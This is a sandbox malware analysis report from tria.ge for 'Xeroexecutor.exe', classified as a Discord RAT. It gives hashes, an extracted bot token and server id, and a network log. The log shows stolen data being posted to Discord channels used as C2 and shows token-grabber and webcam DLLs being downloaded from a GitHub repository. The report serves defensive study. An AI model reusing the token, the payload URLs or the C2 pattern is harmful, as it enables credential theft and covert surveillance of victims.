Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
126s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09/05/2024, 14:23 UTC
Behavioral task
behavioral1
Sample
Xeroexecutor.exe
Resource
win10-20240404-en
General
-
Target
Xeroexecutor.exe
-
Size
78KB
-
MD5
a4b35f10a18f1c4360b00f828abbc2b5
-
SHA1
78c9ba86d8b3ca966b66ddb182c08268c79858a6
-
SHA256
b4ca7c2c6efafb1d7402096885dcae56f6fb3d845b758ed3c1cfef21792e1444
-
SHA512
47703141997cae647f52f692a62b38bc7543f739b5334f387f8753716cadb488898abeda21732b13c7153e0bcbc76a44c9d821f899c3b137892587538296bb3b
-
SSDEEP
1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+KPIC:5Zv5PDwbjNrmAE+WIC
Malware Config
Extracted
discordrat
-
discord_token
MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
-
server_id
1237709600602722354
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Downloads MZ/PE file
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 12 discord.com 17 raw.githubusercontent.com 25 raw.githubusercontent.com 3 discord.com 14 discord.com 15 discord.com 28 discord.com 4 discord.com 19 discord.com 21 discord.com 27 discord.com 8 discord.com 11 discord.com 18 raw.githubusercontent.com 26 discord.com -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2676 Xeroexecutor.exe Token: SeShutdownPrivilege 2676 Xeroexecutor.exe
Processes
Network
-
Remote address:8.8.8.8:53Requestgateway.discord.ggIN AResponsegateway.discord.ggIN A162.159.135.234gateway.discord.ggIN A162.159.133.234gateway.discord.ggIN A162.159.130.234gateway.discord.ggIN A162.159.136.234gateway.discord.ggIN A162.159.134.234
-
Remote address:162.159.135.234:443RequestGET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: 26iAYpXxRTASShXuIDK1Ig==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg
ResponseHTTP/1.1 101 Switching Protocols
Connection: upgrade
sec-websocket-accept: xvw7DTNjAc820iBnkI2DQMdFcAQ=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNERUNV4VWnm0NklWCs0C%2BlWctksfZgkcnYz2Kr8ai6nIHEo4CiC5jW6S1rH1jT5QE%2Bg4xOIyBTJHbuIBcomwbS7JtaT1PqQjvqI70zaJT3o50kvAu4fxwlP4rOXTBDtoCJxEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8812591f6d4460dd-LHR
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.136.232discord.comIN A162.159.137.232discord.comIN A162.159.135.232discord.comIN A162.159.138.232discord.comIN A162.159.128.233
-
Remote address:162.159.136.232:443RequestPOST /api/v9/guilds/1237709600602722354/channels HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 201 Created
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9274f580e0f11efa46a7a13f4bcce61; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1715351016.418
x-ratelimit-reset-after: 86400.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2F0H9GkPG7sZjznhax8JHbW6pJ72LhTI7unnyaDpkuJ0WH7a4NOC6WUOU3jptLViuDCjLHG2rbHIyZx5mc7vmQEeigIvK84iH%2FM4qDjERL%2BXzARWMRYn%2BhioM1c2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9274f580e0f11efa46a7a13f4bcce615a4b103059f82c89957e4d041c301ced9ffe6c9540ce712e90bb1456cc39b7f3; Expires=Tue, 08-May-2029 14:23:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=db113242c805bd68379ae757c1d2a7326a199ad8-1715264616; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=x86uKguZnLGbKrcpwAH8x9QMLXs3Tm_4neGZTg9lw_E-1715264616588-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8812592bdca57324-LHR
-
Remote address:8.8.8.8:53Request234.135.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestgeolocation-db.comIN AResponsegeolocation-db.comIN A159.89.102.253
-
Remote address:159.89.102.253:443RequestGET /json HTTP/1.1
Host: geolocation-db.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Date: Thu, 09 May 2024 14:23:36 GMT
Content-Type: text/html
Content-Length: 194
Location: https://geolocation-db.com/json/
Connection: keep-alive
-
Remote address:159.89.102.253:443RequestGET /json/ HTTP/1.1
Host: geolocation-db.com
ResponseHTTP/1.1 200 OK
Date: Thu, 09 May 2024 14:23:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 116
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b9b7ce340e0f11efb257dadefbae2c79; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264618.361
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXAORW3WOUuIhRTr952VRUOQ07sWTOjYUOXsMclguNQwxj%2BYlnGS6lo%2BLApNeMgkBM0yHAZLn29eSDqZhWfjkYmFN7Re%2FRZJpsMsn%2BMknSChVMgJrkV3kGnj2Gal"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b9b7ce340e0f11efb257dadefbae2c79d456d5a29d6e8a7e54f42fc3a484543b10e3c8096b4fc673cf3ea53082b42237; Expires=Tue, 08-May-2029 14:23:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=c3b3aa51e84a0bce716afb777fac4983703e1d6d-1715264617; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=QQo4n5cBgvbVnTOsv3D8uysehUQ1oePMyuQRKc1cFEk-1715264617536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125931cdd276cc-LHR
-
Remote address:8.8.8.8:53Request232.136.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request253.102.89.159.in-addr.arpaIN PTRResponse
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="0b7af09f-1a4b-473f-8fee-8a83f669034f"
Host: discord.com
Content-Length: 429690
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c107038a0e0f11efba074a1ad3516406; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264630.216
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyYc5VkzTsbhb9%2FdVZbBQrV6ZL0Q61UeXiSsmq2MAuEtSrG2OoVhVOyjGILnuu9xRvlSN1g7rAJYz4qJ%2FIu3jR3JYZslDWdJK4LYaQlU3HWe43GdICL1EXtG0vnj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c107038a0e0f11efba074a1ad351640653ccf9503c86a9a31b8920d67b48c40cc30853fe42bae314dddafc93311fdeb8; Expires=Tue, 08-May-2029 14:23:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=4d2d09abd90ca0308dbeac8f4c7934388a76aded-1715264629; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=NhHutmer7BF2rF3rPM1QEhsMaFETW4khjoyEn3bv5LU-1715264629800-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125979c834941b-LHR
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c13bc9120e0f11efa5cd7ef7caddeb3d; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264631.221
x-ratelimit-reset-after: 1.175
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FlY15EmmpCTtkAfjZ08xu8JBudQ4HwOHL3GbWm%2FR0zLF60GEraeXlyZq22NIpYs6%2BQMbDViGfSoqRTFnYvQYYjdyIZlnTOBmSZUYFzETHqeHJZW9Kxeif25dCG4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c13bc9120e0f11efa5cd7ef7caddeb3db108e21db7ccbf144bb2f3824b4a9082d25bfc3d56ddc7922c57ec6f3d3cc63f; Expires=Tue, 08-May-2029 14:23:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=f6cfec3732f0bed84bd169e004f9f2931489d36a-1715264630; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=EU8qKb_d503I2bIYIJdoQwb_9QiZmjlT8z0hfx8uz8k-1715264630146-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259810d17949c-LHR
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: multipart/form-data; boundary="9c70f21a-37b0-4f9d-a736-294f6de117c8"
Host: discord.com
Content-Length: 3557
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c9291fee0e0f11ef87867ee3850b10bd; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264644.031
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI7Zkamq078CQMvt6hNUdHZ%2F5xRX0buDZIocaVQsrPB0DUlt7IsgWOLSWkDi3gv07kJi4DXUpbfxnn3KNZtemdHb0ywnzicamcc6ew9RpKZGheBNKOAOWlT%2FePU7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c9291fee0e0f11ef87867ee3850b10bd6eaca715e2631d527c05eba598e51446694bf93584aaba494cd060d32632f86f; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=kp9yikD.9AYczCKuJwmPGejBrw3hBQVPx0UVH4eMz34-1715264643444-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d1bdaa24b7-LHR
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264645.025
x-ratelimit-reset-after: 1.329
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCsvN0eqnwTCJaL1OdCL%2BqjaPjVUJgpcbCpYtyfGpC8pM4L9wbGoatS80zuj0Md9DNJIwJgE5gS2GDeyvSxkqMupLwxtAnL15%2BbIipbzhKp1RfRaCKS7Leo0gvos"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=c95eed9a0e0f11ef8a96ee0fdedbfaae4cba57d10d1d3d3844b4c3cae959069cc3daa742ab76399ec891938ffaa5a278; Expires=Tue, 08-May-2029 14:24:03 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=df9f07d9999f1566681e241643ca11fb25020dba-1715264643; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=CQscJ9x_5JYZd0RB6OnAZ8Q1AOZDkPd1P6K_ZvZQZg8-1715264643815-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 881259d649867198-LHR
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.110.133
-
GEThttps://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dllXeroexecutor.exeRemote address:185.199.109.133:443RequestGET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 2901504
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7aa094c7a5e7645371637e2935e65a95ac7ec8899b4f08b38009a9f1887128d9"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 520A:17E061:3B5A3F:48EFFD:663CDCA6
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:24:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600085-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264679.998598,VS0,VE199
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 538f4d5eff5fb505522334cff6a94d1eacf807e9
Expires: Thu, 09 May 2024 14:29:39 GMT
Source-Age: 0
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df0afe720e0f11efb08556f99f94da73; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264681.039
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lsb8%2Bn1SuAGTkjVowoOxZUylyCfidozjUPeP00CyWftmp4qo6IELWnv3MsquYyWaFQfCUXzjkyfcFvMTBfxw8ZKSVydMZyenb8I70v%2FoKhalU4N%2BCVQkbqG8Vr7q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df0afe720e0f11efb08556f99f94da7330d953b55fa52cc76d030e691d48b209c471300f16eef5692765464f2041e819; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=7QIfCTAc5akM358jxHdiJsw2fON.ylycnpSku4SM51Q-1715264680162-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125ab939179503-LHR
-
Remote address:8.8.8.8:53Request133.109.199.185.in-addr.arpaIN PTRResponse133.109.199.185.in-addr.arpaIN PTRcdn-185-199-109-133githubcom
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=df3f10ae0e0f11ef8953a27d37c5972a; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264682.039
x-ratelimit-reset-after: 1.630
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sanHyNzJwbZDqLJKKi5cV4xBSNAPYQ2p8ZcCX5D4g3W69q7WSmnU%2F4x%2FEMcohuQ8CRbktFIq%2Fks3eFhJmhB4cE3iXmgjGehiImt%2Bkr3KiSgCE%2FIK9WNWgwhfB6Og"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=df3f10ae0e0f11ef8953a27d37c5972a1e8724111627e64e20fe8ec32ee64f6aeb9861ede0d2d28478b6e9369b085f06; Expires=Tue, 08-May-2029 14:24:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=9fed67a20803f8a2d12c0145ac82f6fdd218f820-1715264680; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=6IfMpQHY4tG9KbUqXiMqNRrfoBEVKM8ap_LuFxwTFeE-1715264680514-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125abbca3a79c6-LHR
-
Remote address:8.8.8.8:53Request13.227.111.52.in-addr.arpaIN PTRResponse
-
GEThttps://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dllXeroexecutor.exeRemote address:185.199.109.133:443RequestGET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll HTTP/1.1
Host: raw.githubusercontent.com
ResponseHTTP/1.1 200 OK
Content-Length: 39936
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "f50f41ce6d31d22a2bffcc57235e46a4d7a05fb38896fd150333f34701eb4b56"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 515C:1CC8B4:2ED44A:397B90:663CDCBE
Accept-Ranges: bytes
Date: Thu, 09 May 2024 14:25:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600096-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1715264711.545413,VS0,VE157
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 13e5eacf71b2ed7f841b43abb8b0846c6807e6c7
Expires: Thu, 09 May 2024 14:30:10 GMT
Source-Age: 0
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f181d76a0e0f11efb6b79ac70ff69aa5; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715264712.004
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Fu8bG6l90l9JOVacq7Pa4cghpHOoWWMnB%2FZeFyCfBH%2Ft6EPG0Qf9LSPf9zU2BEkR%2BzBetIlsafnoZJ75DAcob10PQz4vGhVT89cIKfEXGY%2BXIBhi6aVdeChPul2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=f181d76a0e0f11efb6b79ac70ff69aa5f0e09a6a2ccd5fe0edea1959d498408e6e9fd9d42fbd5775fee476eb4a9324f3; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=948f4f443802a6bf7701eb9ed1444e066c3e880a-1715264711; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=_6stMbfZGNtJeHtgtFb9NqukjykNIaUUXTzLq.f4tWI-1715264711133-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88125b7b0ac77735-LHR
-
Remote address:162.159.136.232:443RequestPOST /api/v9/channels/1238134282950676521/messages HTTP/1.1
authorization: Bot MTIwNjA0MDA2MDI2NTM2NTUwNA.GStFBi.KFxuLXKvS3XujUPdFiaRzwKmwtmjd2uDdKdcmY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=f1b5d7720e0f11ef8ac69a2afe861c28; Expires=Tue, 08-May-2029 14:25:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1715264713.003
x-ratelimit-reset-after: 1.625
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fYgpmitI9XGFTCOECvkpOA77LqT3aIuvGWvg0pGqiWcZDl8AmZOQQybcpcccv6TE%2BuOcmkUDDnt55xMQe9%2Bd%2BFtlO45gwrjvOXUUczNPIRSd48e5NquGAotuF5P"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
